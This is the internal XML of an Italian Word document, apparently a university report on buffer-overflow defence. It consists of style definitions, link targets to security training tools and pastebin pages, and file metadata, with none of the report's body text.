    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo9Carattere">
    <w:name w:val="Titolo 9 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Didascalia">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="35"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D050C"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="44546A" w:themeColor="text2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="TitoloCarattere"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="001D050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1D050C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:spacing w:val="-15"/>
      <w:sz w:val="72"/>
      <w:szCs w:val="72"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sottotitolo">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="SottotitoloCarattere"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="001D050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ttotitoloCarattere">
    <w:name w:val="Sottotitolo Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Sottotitolo"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasigrassetto">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasicorsivo">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nessunaspaziatura">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NessunaspaziaturaCarattere"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="001D050C"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citazione">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="CitazioneCarattere"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="001D050C"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitazioneCarattere">
    <w:name w:val="Citazione Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Citazione"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citazioneintensa">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="CitazioneintensaCarattere"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="001D050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zioneintensaCarattere">
    <w:name w:val="Citazione intensa Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Citazioneintensa"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:spacing w:val="-6"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasidelicata">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasiintensa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Riferimentodelicato">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="001D050C"/>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1D050C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Titolodellibro">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolosommario">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Titolo1"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D050C"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NessunaspaziaturaCarattere">
    <w:name w:val="Nessuna spaziatura Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Nessunaspaziatura"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="004D62CA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004D62CA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentoipertestuale">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00751302"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentovisitato">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00751302"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormaleWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0098048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1919B1"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003441B6"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003441B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6629">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="208420844">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="498695999">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="619337487">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="723523804">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="798842991">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1894199325">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2114519124">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="212371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li.org/get-kali/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pastebin.com/3q0Mt1KK" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pastebin.com/vwqWTSeT"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corelan/mona" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pastebin.com/SPdPn87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pastebin.com/87PcV6eU" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pastebin.com/bVr85Yf4" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pastebin.com/CpUJZj8z" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cytopia/badchars" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.immunityinc.com/products/debugger/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pastebin.com/uHrUYZKL" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pastebin.com/xqmgTK6z" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://it.wikipedia.org/wiki/LIFO" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://it.wikipedia.org/wiki/Buffer_overflo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stephenbradshaw/vulnserver" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.PNG"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=qSnPayW6F7U&amp;t=406s" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://it.wikipedia.org/wiki/Pila_(informatica)"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4.jpg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jp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footer" Target="footer1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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F5EF7-FD6D-4C98-9064-3857453E3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15</Pages>
  <Words>4420</Words>
  <Characters>25194</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>209</Lines>
  <Paragraphs>59</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Titolo</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>Relazione Internet Security</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Matricola: X81001007</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>29555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Internet Security</dc:title>
  <dc:subject>Buffer OVERFLOW (Difesa)</dc:subject>
  <dc:creator>STEFANO LEONE</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>STEFANO LEONE</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-28T17:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-01T14:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>